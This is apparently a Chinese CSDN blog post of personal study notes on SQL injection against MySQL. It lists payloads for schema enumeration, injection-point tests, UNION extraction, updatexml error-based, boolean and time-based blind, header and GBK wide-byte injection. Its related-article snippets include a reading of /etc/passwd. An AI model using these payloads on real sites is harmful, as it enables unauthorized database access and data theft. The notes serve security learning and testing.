sql注入实战笔记(未完待续)

最新推荐文章于 2024-06-08 15:21:52 发布
最新推荐文章于 2024-06-08 15:21:52 发布
阅读量344 收藏 2
点赞数
文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45784586/article/details/105596609
版权

文章目录

sql注入实战笔记

sql注入基础

在数据库中有 information_schema 储存着数据库信息 我们可以从中查询任意字段所在的库表列

查库select schema_name from information_schema.schemata
查表select table_name from information_schema.tables where table_schema=''
查列 select column_name from information_schema.columns where table_name=''
查字段 select 列名,列名from 库名.表名
 limit a,b   (a表示从a+1个数据库开始,b表示从查多少个)
查询各种权限的用户:  select user()
		   select system_user()
		   select  current_user()
查询当前数据库名称: select database()
查询数据库版本: select version()
查询数据库路径:select @@datadir
查询操作系统:select @@version_compile_os

注入点测试

sql注入根据参数所传类型大致可以分为两类 字符型注入和数字型注入

数字型注入

sql语句大致为 select * from <表名> where id = x

可以用 and 1=1 和 and 1=2 来判断是否存在注入点

字符型注入

sql语句大致为 select * from <表名> where id = 'x'

我们可以用 1'1'—— qwe 来判断是否存在注入点

或者 1’ and ‘1’=‘1 和 1’ and ‘1’='2 来判断是否存在注入点

union 回显注入

测试当前表中存在几列 order by 3

测试回显位置 union select 1,2,3

在回显位置 查询 union select 1,2,database()

报错注入

updatexml

UPDATEXML (XML_document, XPath_string, new_value);

参数1:xml 文档独享

参数2:路径(Xpath语法)

参数3:替换查找到的符合条件的数据

注入原理:通过符号字符构造不符合XPath语法的路径引发报错,从而使得sql语句执行并在报错信息中回显

例如 updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

布尔注入

注入原理:通过有无回显信息猜解字符串

所用函数

length() 反回字符串长度 例如猜解数据库长度 length(database()) =12

substr(string,start,length) 截取字符串 例如猜解字符串长度 substr(database(),0,1)=‘a’

left(a,b)截取字符串 例如 left(a,b)从左侧截取 a的前b位

regexp 正则匹配函数 例如 select user regexp ‘r’ user 的结果假设是root regexp匹配root的正则

like 正则匹配函数 select user() like ‘roo%’ 也是匹配但是必须从第一个字符开始

ascii()/ord() 将字符转换成ascii值

时间盲注

sleep() 等待几秒 例如 sleep(10)等待十秒

结合布尔盲注的函数 只是换了一种猜解方式

head头注入

任何与数据库交互的地方都可能存在sql注入漏洞

有时候网站会在数据库中保存我们的ip以及User-Agent 信息 如果通过http数据报头形式储存

那么可以构造http报头的字段进行sql注入

采用updatexml 函数

构造如下形式

666' or updatexml (1,concat (0x7e,database()),0) or '

宽字节注入

前提:sql注入所需要的特殊符号’‘或’ 被转义且mysql中采用的是gbk编码

注入原理:利用了gbk编码的特性

即0x00-0x7F范围内是单字节第一位,和 ASCII 保持一致。双字节的第一字节范围是0x81-0xFE

例如

输入 0xbf27

转义加上了0xbf5c27

在mysql解析中变成 0xbf5c 和0x27 从而吃掉了\逃逸出来’

moth404
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql手工注入实战
mulincong的博客
05-30 2250
sql手工注入封神台靶场
SQL注入实战
qq_44915227的博客
04-17 1799
所谓的SQL注入,就是通过把恶意的sql命令插入web表单递交给服务器,或者输入域名或页面请求的查询字符串递交到服务器,达到欺骗服务器,让服务器执行这些恶意的sql命令,从而让攻击者,可以绕过一些机制,达到直接访问数据库的一种攻击手段,而不是按照设计者意图去执行SQL语句。
SQL注入实战总结
qq_44657899的博客
06-16 1400
文章目录0x01 联合注入:union0x02 boolean注入 盲注 0x01 联合注入:union database()库名 user()用户 version()版本号 load_file('/etc/passwd') group_concat(password) 0x02 boolean注入 盲注 基本思路 and 1=1 返回1 yes and 1=2 返回0 no 判断数据库长度 ' and lenth(database())>=4 --+ 判断数据库名字 ' and substr(d
入门级 SQL 注入实战
最新发布
菜鸟学识的博客
06-08 765
得到users表的所有字段。uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。直接在username中填写admin’or 1=1#,password随便写,此时登录成功,Username存在SQL注入漏洞。
入门级SQL注入实战-sqli_labs
2302_76378481的博客
06-15 1161
ascii表的s值对应的是115,如果我们猜测到115的时候,and后面的值为真,前面的值也为真,就会出现 1 and 1的情况, 页面就会有提示信息。确定数据库的表是3列了,接下来使用union联合查询,查询当前数据库名,查询时讲前面的查询语句设为空,所以输入没有的值,111 union select 1,database(),3,后面代码逻辑第一行不显示,所以在第二个字段查询。大家好,这篇文章写的是一些入门级简单的sql注入,可以简单看一下,写了集中注入的手法,联合注入、报错注入、布尔盲注、延时盲注。
【burpsuite安全练兵场-服务端1】SQL注入-17个实验(全)
12-27 1万+
【BP靶场-服务端-SQL注入】16个实验-万文详细步骤
sql注入教程.sql注入实战
11-09
sql注入详细教程 寻找存在sql注入的网址 探测过滤 tamper 得到shell
SQL注入绕过实战案例
08-31
本文将深入探讨SQL注入的概念、工作原理,并通过"SQL注入实战案例"来阐述如何进行有效防御和绕过。我们将基于sqli-labs-master靶场进行学习,这是一个专门用于SQL注入攻防演练的平台。 SQL注入SQL Injection)是...
SQL注入手工笔记.txt
11-29
SQL手工注入小结笔记,大家都来学习学习
一篇文章教你玩转,入门级 SQL 注入实战
朱雀随云记的博客
04-11 620
uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。
记一次对真实网站的SQL注入实战
qq_43678263的博客
03-31 5044
记一次对真实网站的SQL注入实战前言发现过程漏洞利用总结 前言 某集团股份有限公司网站存在SQL注入漏洞 发现过程 用针对性工具扫描(这里使用的是超级SQL注入工具)问题网站,得到以下链接均存在SQL注入漏洞 问题URL: fuwu_fanwei.php?fid=1 fuwu_zhichi.php?zid=5 video.php?video_id=1 news.php?nid=1 about.php?aid=1 fuwu_fanwei_content.php?fid=1&id=1 漏洞利用 这里使
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战
zzzfff__的博客
11-21 1823
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
SQL注入的一个简单实例
热门推荐
u012436758的博客
12-25 1万+
很多Web应用程序都使用数据库来存储信息。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递至Web应用程序。很多Web站点都会利用用户输入的参数动态地生成SQL查询要求,攻击者通过在URL、表单域,或者其他的输入域中输入自己的SQL命令,以此改变查询属性,骗过应用程序,从而可以对数据进行不受限的访问。
SQL注入基础实战(i春秋)
Jaychouzzk
08-17 3435
1.Access手工注入  实验环境 操作机:Windows XP 目标机:Windows Server 2003 目标地址:http://172.16.12.2 实验工具 火狐浏览器:火狐浏览器是一款非常流行的Internet浏览器。 实验目的 1、学习Asp手工注入方法 2、学习Asp手工注入原理 实验内容 Access Access是Microsoft Office Acc...
sql注入笔记整理
Shi_Jiayi的博客
09-24 157
本文章只是梳理逻辑和学习sql注入时遇到的问题记录,如有错误,欢迎指正~ 什么是SQL注入SQL注入攻击是利用网站程序漏洞,通过提交恶意构造的SQL语句,以达到窃 取、修改、破坏数据库为目的的攻击。 Get注入和Post注入区别: Get注入可以直接在url修改参数 Post注入要在输入框(请求正文)中修改参数 注入思路: 判断是否有注入(页面是否会因为我们的输入而改变) 能否让页面报错:分别加入“ ‘ ”、“ “ ”和“(”进行测试 如何让页面不报错:让sql语句成功闭合 是否
SQL漏洞注入(附实战练习)
Matheus的博客
05-15 6100
环境部署 phpstudy、DVWA、SQLI-LABS(学习sql注入平台)、upload-labs、课程源码环境web SQL注入原理 SQL 注入就是指 web 应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的 参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql 语句来 实现对数据库的任意操作。 举例说明: id=id=id=_GET[‘id’] sql=SELECT∗FROMusersWHEREid=sql=SELECT * FROM users WHERE
SQL注入实战SQLi-Labs完全攻略
"这篇文档是关于SQL注入的学习资料,主要聚焦于SQLi-Labs练习平台,由LCamry编撰。...这份资料是学习SQL注入和提升安全防护技能的理想资源,通过Sqli-labs的实战练习,读者可以逐步提高对SQL注入的理解和防范能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值